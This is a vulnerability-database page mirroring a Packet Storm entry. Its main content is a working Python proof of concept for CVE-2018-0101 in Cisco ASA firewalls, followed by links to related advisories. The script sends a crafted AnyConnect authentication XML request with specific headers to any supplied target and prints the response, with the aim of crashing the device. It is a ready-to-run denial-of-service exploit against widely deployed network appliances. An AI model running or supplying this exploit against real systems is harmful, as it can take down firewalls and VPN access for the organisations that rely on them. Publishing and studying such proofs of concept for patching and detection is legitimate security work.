Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormSean DillonPACKETSTORM:146296
HistoryFeb 07, 2018 - 12:00 a.m.

Cisco ASA Crash Proof Of Concept

2018-02-0700:00:00
Sean Dillon
packetstormsecurity.com
274

0.958 High

EPSS

Percentile

99.3%

JSON
`#  
# Cisco ASA CVE-2018-0101 Crash PoC  
#  
# We basically just read:  
# https://www.nccgroup.trust/globalassets/newsroom/uk/events/2018/02/reconbrx2018-robin-hood-vs-cisco-asa.pdf  
#  
# @zerosum0x0, @jennamagius, @aleph___naught  
#  
  
import requests, sys  
  
headers = {}  
headers['User-Agent'] = 'Open AnyConnect VPN Agent  
v7.08-265-gae481214-dirty'  
headers['Content-Type'] = 'application/x-www-form-urlencoded'  
headers['X-Aggregate-Auth'] = '1'  
headers['X-Transcend-Version'] = '1'  
headers['Accept-Encoding'] = 'identity'  
headers['Accept'] = '*/*'  
headers['X-AnyConnect-Platform'] = 'linux-64'  
headers['X-Support-HTTP-Auth'] = 'false'  
headers['X-Pad'] = '0000000000000000000000000000000000000000'  
  
xml = """<?xml version="1.0" encoding="UTF-8"?>  
<config-auth client="a" type="a" aggregate-auth-version="a">  
<host-scan-reply>A</host-scan-reply>  
</config-auth>  
"""  
  
r = requests.post(sys.argv[1], data = xml, headers = headers, verify=False,  
allow_redirects=False)  
  
print(r.status_code)  
print(r.headers)  
print(r.text)  
  
`

Related

threatpost 3
checkpoint_advisories 1
talosblog 2
zdt 1
seebug 1
exploitpack 1
nessus 3
cvelist 1
cisco 1
prion 1
cve 1
exploitdb 1
trendmicroblog 1
fireeye 1
kitploit 1
threatpost
threatpost
Cisco Patches Critical VPN Vulnerability
2018-01-30 11:06:13
Cisco Issues New Patches for Critical Firewall Software Vulnerability
2018-02-06 10:34:27
Cisco Confirms Critical Firewall Software Bug Is Under Attack
2018-02-09 13:06:34
checkpoint_advisories
checkpoint_advisories
Cisco Adaptive Security Appliance Remote Code Execution (CVE-2018-0101)
2018-02-01 00:00:00
talosblog
talosblog
Beers with Talos EP 22: Forget the ASA, Rob Joyce Favorited Craig’s Tweet
2018-02-06 11:15:00
ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices
2024-04-24 15:54:39
zdt
zdt
Cisco ASA - Crash PoC Exploit
2018-02-07 00:00:00
seebug
seebug
Cisco Adaptive Security Appliance Remote Code Execution and Denial of Service Vulnerability
2018-01-31 00:00:00
exploitpack
exploitpack
Cisco ASA - Crash (PoC)
2018-02-07 00:00:00
nessus
nessus
Cisco ASA Remote Code Execution and Denial of Service Vulnerability (cisco-sa-20180129-asa1)
2018-01-30 00:00:00
Cisco Firepower Threat Defense (FTD) Adaptive Security Appliance Remote Code Execution and Denial of Service Vulnerability (cisco-sa-20180129-asa1)
2018-02-06 00:00:00
Cisco ASA Remote Code Execution and Denial of Service Vulnerability (cisco-sa-20180129-asa1) (destructive check)
2018-02-26 00:00:00
cvelist
cvelist
CVE-2018-0101
2018-01-29 20:00:00
cisco
cisco
Cisco Adaptive Security Appliance Remote Code Execution and Denial of Service Vulnerability
2018-01-29 17:00:00
prion
prion
Double free
2018-01-29 20:29:00
cve
cve
CVE-2018-0101
2018-01-29 20:29:00
exploitdb
exploitdb
Cisco ASA - Crash (PoC)
2018-02-07 00:00:00
trendmicroblog
trendmicroblog
TippingPoint Threat Intelligence and Zero-Day Coverage – Week of February 5, 2018
2018-02-09 16:55:38
fireeye
fireeye
Think Fast: Time Between Disclosure, Patch Release and Vulnerability Exploitation — Intelligence for Vulnerability Management, Part Two
2020-04-13 00:00:00
kitploit
kitploit
Radamsa - A General-Purpose Fuzzer
2024-03-25 11:30:00

0.958 High

EPSS

Percentile

99.3%

JSON
Related for PACKETSTORM:146296
threatpost3checkpoint_advisories1talosblog2zdt1seebug1exploitpack1nessus3cvelist1cisco1prion1cve1exploitdb1trendmicroblog1fireeye1kitploit1